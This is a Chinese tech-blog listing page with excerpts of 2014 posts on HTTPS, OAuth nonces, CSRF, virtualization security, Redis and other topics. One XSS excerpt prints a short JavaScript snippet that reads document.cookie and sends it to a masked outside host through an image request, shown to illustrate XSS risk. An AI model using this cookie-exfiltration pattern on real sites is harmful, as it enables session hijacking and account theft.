我们常常提到HTTPS使用了SSL/TLS加密协议,是一种非常安全的WEB通信机制,这句话从某种角度来说是对的。我觉得更准备地应该说是针对传统的明文嗅探进行了有效的防御。但同时,我们应该认识到,安全技术、攻击方式往往在不同的场景、组合不同的技术可以形成多种多样的业务架构,而安全问题往往就发生在这些新...
分类:
其他好文 时间:
2014-05-25 22:24:08
阅读次数:
1624
验证redis的主从复制,将实验过程抓图复制配置文件更改slave的端口
和相关master配置主从复制测试研究在OAuth中的“一次数”nonce有什么用途?怎样使用?以此熟悉OAuth的全流程 nonce
,一个随机的混淆字符串,仅仅被使用一次的数。nonce 用于防御回放攻击和选择明文攻击。使...
分类:
数据库 时间:
2014-05-24 09:35:59
阅读次数:
396
本文内容分为安全策略和虚拟化安全管理,重点讲介绍虚拟化安全0x01
实施安全策略安全策略是有效的安全防御机制的基础,公司如果在没有创建安全策略、标准、指南、流程等基础的情况下,首先实现了技术解决方案,会导致安全控制机制目标不集中下图是安全策略的层析结构关系:
策略通常被认为是最高层的文档,而...
分类:
其他好文 时间:
2014-05-23 22:14:39
阅读次数:
635
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
拦截导弹描述某国为了防御敌国的导弹袭击,发展中一种导弹拦截系统。但是这种导弹拦截系统有一个缺陷:虽然它的第一发炮弹能够到达任意的高度,但是以后每一发炮弹都不能高于等于前一发的高度。某天,雷达捕捉到敌国导弹来袭。由于该系统还在试用阶段,所以只用一套系统,因此有可能不能拦截所有的导弹。输入第一行输入测试...
分类:
其他好文 时间:
2014-05-19 19:58:53
阅读次数:
230
云主机的网络结构本质上和传统的网络结构一致,区别大概有两点。
1.软网络管理设备(如nova-network,open switch)部分替代硬件网络设备 。
2.多虚拟服务器共享一个宿主机物理网卡(使用Trunk技术)。 那么对于云服务器的安全,我们也可以采用传统的网络安全...
分类:
其他好文 时间:
2014-05-17 00:39:16
阅读次数:
366
EAFP:Easier to ask for forgiveness than permission
获得事后原理总是比事先得到许可要容易的多。这个EAFP在python中表现的比较多。EAFP,This common Python coding style
assumes the existenc...
分类:
其他好文 时间:
2014-05-16 00:47:39
阅读次数:
511
0x01 什么是CSRF攻击 CSRF是Cross Site Request
Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。
网站是通过cookie...
分类:
其他好文 时间:
2014-05-15 21:20:25
阅读次数:
244
软考中关于病毒的考查很多,我总结了一些病毒的基本知识,并把近几年的考题分析了一下,共所有备考的童鞋们参考~~
【2011年 11月真题
7】
利用( 7)可以获取某FTP服务器中是否存在可写目录的信息。
(7)A.
防火墙系统 B.漏洞扫描系统
C. 入侵检测系统 D.
病毒防御系统
分析:
漏洞扫描系统是用来自动检测远程或本地主机安全漏洞的程序。安全漏洞通常指硬件...
分类:
其他好文 时间:
2014-05-13 06:57:20
阅读次数:
408
今天开始写塔桥防御这个小游戏我这边也就不一步一步记录了 本文只记录我在写代码过程中遇到的坑 需要注意
学习的地方 全部更新在这个随笔中 。1.使用Camera.main这个函数 如果你的场景中没有标记主相机的Tag为 Main Camera 会报错
。2.Awake你不能执行协程。
分类:
其他好文 时间:
2014-05-11 04:26:31
阅读次数:
272
